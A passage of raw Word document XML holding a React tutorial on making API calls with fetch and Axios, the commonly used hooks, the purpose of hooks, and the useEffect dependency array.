          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0227D2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CD3579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62D4FE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etch('https://api.example.com/data'): Sends a GET request to the provided API URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034448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response.json()): Converts the response to a JavaScript object if it's in JSON format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035A23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data =&gt; setData(data)): Updates the React component's state with the fetched data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D1A8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y errors that occur during the fetch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EB0B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ing Axios (Third-Party Library)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F0F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 is a popular third-party library that provides a cleaner API for making HTTP requests and handling responses, especially for more complex scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612102A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irst, you need to install Axios using npm or yarn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7074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pm install axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E46D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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FB0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arn add axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315DD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Axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA35D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2C217B4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axios from 'axios';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83801B" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED6447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1D0CFC4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1636ACA6" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8A1E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2FAE64C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xios.get('https://api.example.com/data')  // Replace with your API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C302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setData(response.data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF5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FC4811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00991977" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C728F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20AF2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18F65A8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h1&gt;API Data:&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA9F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52B96C2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E7724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BCAD5D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F7B4485" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570075D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7B6671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3B9CD1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get('https://api.example.com/data'): Sends a GET request to the provided API URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C975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setData(response.data)): Updates the component's state with the response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E718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d logs any errors that occur during the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E51E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When to Use fetch vs. Axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB89B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etch</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for simple requests and if you want to avoid adding extra dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25F72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Recommended when you need advanced features like automatic JSON handling, request/response interceptors, or handling of HTTP error codes in a more customizable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1187329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oth methods can be used in React to make backend API calls, but Axios offers more convenience and features out of the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D72E50" w14:textId="3EB93833"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830" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19485425" w14:textId="43708CB6" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="00932757">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="938" w:name="_Toc197868152"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are other Hooks in React</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="938"/>
    </w:p>
    <w:p w14:paraId="34C7AF42" w14:textId="79D46E7D" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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several built-in hooks that allow you to manage state, side effects, context, and more in functional components. Here’s a list of the most commonly used hooks in React:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B34B7"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eState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42441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clare state variables in a functional component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B310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AD57B8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eEffect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF04ED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managing side effects in a functional component, such as fetching data, updating the DOM, or subscribing to events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D90C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23781A1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component mount or update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E424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when the dependencies change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59921F78"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Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE31D5"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access the context values created by the createContext API in React. It allows you to share state across the component tree without having to pass props down manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AA0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value = useContext(MyContext);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BEE7F6"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useReducer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5A28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more advanced alternative to useState for managing state when it’s more complex, like handling multiple actions in one state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC81C6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dispatch] = useReducer(reducerFunction, initialState);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6B10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useCallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F30F7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ersion of the callback function that only changes if one of the dependencies has changed. It's useful to prevent unnecessary re-renders of components that depend on callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A46C7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Callback = useCallback(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE117B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Function logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556F0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73438A85"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useMemo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125F6D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alue. It’s used to optimize performance by recomputing the value only when one of the dependencies changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A9C5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Value = useMemo(() =&gt; computeExpensiveValue(a, b), [a, b]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCD5CF"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useRef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07330C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utable ref object that persists for the lifetime of the component. It can be used to reference DOM elements or store mutable values that don’t cause re-renders when changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C65FAD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yRef = useRef(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55DC6E"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useLayoutEffect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF673B4"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milar to useEffect, but it’s fired synchronously after all DOM mutations. It's useful when you need to measure or make adjustments to the DOM before the browser repaints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C19116"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LayoutEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7EAE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hat interacts with the DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202ABD8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22B61E0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useImperativeHandle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA52D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izes the instance value that is exposed when using ref in a parent component. This allows you to control what properties or methods a child component exposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04392F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ImperativeHandle(ref, () =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE752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ocus: () =&gt; { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71A0A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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C083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143397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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01234A"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useDebugValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B38E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debugging custom hooks. It lets you display a label in React DevTools for your custom hook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246201F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ebugValue(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2C56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seTransition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C351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mark certain updates as "transitions," which will allow React to keep the app responsive while processing expensive updates (useful for concurrent rendering).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DCCAE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isPending, startTransition] = useTransition();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C60F82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useDeferredValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1DC4B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fer the update of a value until the browser has more idle time, which helps to keep the app responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14108FC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deferredValue = useDeferredValue(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A67887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useSyncExternalStore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB6DF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hook to subscribe to external stores (like a state management library or a global store) and get the latest snapshot of the store’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E7493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 useSyncExternalStore(subscribe, getSnapshot);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFC5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hooks allow you to manage state, side effects, context, refs, performance optimizations, and more in functional components, making React a powerful library for building user interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A1E89" w14:textId="12842CBC"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831" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4771D" w14:textId="307EB8F5" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="00811A55">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="939" w:name="_Toc197868153"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of Hook</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="939"/>
    </w:p>
    <w:p w14:paraId="0142E163" w14:textId="7C1C24AB"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purpose of hooks in React is to enable the use of state and lifecycle features in </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which previously were only available in </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Hooks allow you to write cleaner, more reusable, and easier-to-understand code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD456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re’s a breakdown of the key purposes of hooks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBF08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State Management in Functional Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647789A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only class components could have state. With the introduction of useState, you can now add state to functional components, making it easier to manage dynamic data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E92D0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  // Adds state to a functional component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047233F4"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ide Effects Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FBE2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48AC9E5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mount and update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143701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on dependency change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330A95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Reusability of Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDDD0F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ooks encourage </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reusable logic</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can extract logic into custom hooks, allowing you to share logic between components without changing the component structure or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6637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useCustomHook() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E423D2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logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31874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someValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F241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EB7EE15"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leaner and More Concise Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113554C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functional components can handle complex logic without the need for a class-based component structure, making your codebase cleaner and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460306A7"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 Access to React Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2307C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provide a direct API for handling different features such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EDAE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State: State management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DB0C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Side effects (like data fetching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83E1E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Accessing context values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DBD9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ducer: More complex state logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE055C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Accessing DOM elements or keeping mutable values across renders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C47850A"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Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7B0FE"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like useMemo and useCallback allow you to optimize performance by memoizing expensive calculations and callbacks so they aren't unnecessarily recalculated or re-rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDCA60"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implified Lifecycle Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9B75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Better Composition of Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B365BA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you can break down logic into smaller functions, making it easier to compose and manage components, improving code organization and testability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F673FC2" w14:textId="77777777" w:rsidR="002E0B3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F39FB6">
          <v:rect id="_x0000_i3832" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2705B56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summary, the primary purpose of hooks in React is to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enhance functional components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by enabling features like state management, side effects, context, and optimizations, while making the code simpler and more reusable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7480BA" w14:textId="67406FB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3833" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7623D4F5" w14:textId="0602050B" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA1B73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="940" w:name="_Toc197868154"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the dependency array in useEffect</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="940"/>
    </w:p>
    <w:p w14:paraId="771C0E4E" w14:textId="45B66781" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in useEffect is an optional second argument that determines when the effect should run. It is an array of values (usually props or state) that </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the effect depends on</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If any value in the dependency array changes between renders, the effect will re-run. If the array is empty ([]), the effect will only run once — when the component is mounted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DBB01"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 of Dependency Array in useEffect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DBC1C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Array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When you pass an empty array as the second argument to useEffect, the effect will run </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only once</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, after the initial render. This is similar to the behavior of componentDidMount in class components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A67DE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5B3A16F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only once, after the initial render");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FACB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 Empty dependency array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2B2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With Dependencies ([dep1, dep2,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pass an array with dependencies, the effect will run after the initial render </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and whenever any of the values in the array change</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE836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68CC6B9" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B0814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1B5C1AA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hanged to: ${count}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776F90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 Runs whenever 'count' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CF15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above example, the effect will run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F026D7E"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fter the initial render.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F5609"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very time the value of count changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42047A4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Dependency Array</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omit the dependency array altogether, the effect will run </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after every render</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the component, just like componentDidUpdate in class components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2C11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70457E8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after every render");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351389E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No dependency array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D8DB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est Practices for Using the Dependency Array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52DE4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lways include all variables used inside useEffect that are </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>outside</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of it (like props, state, or functions) in the dependency array to avoid potential bugs due to stale closures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52253A9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the effect to run once on mount and not re-run again, use an empty array ([]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794621B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need the effect to run based on certain state or props, list those variables inside the dependency array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288B91C"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with Multiple Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232273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r effect depends on more than one variable, you can list all of them in the dependency array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79180E3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nst [count, setCount] = useState(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE784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name, setName] = useState("Alice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE012FC" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
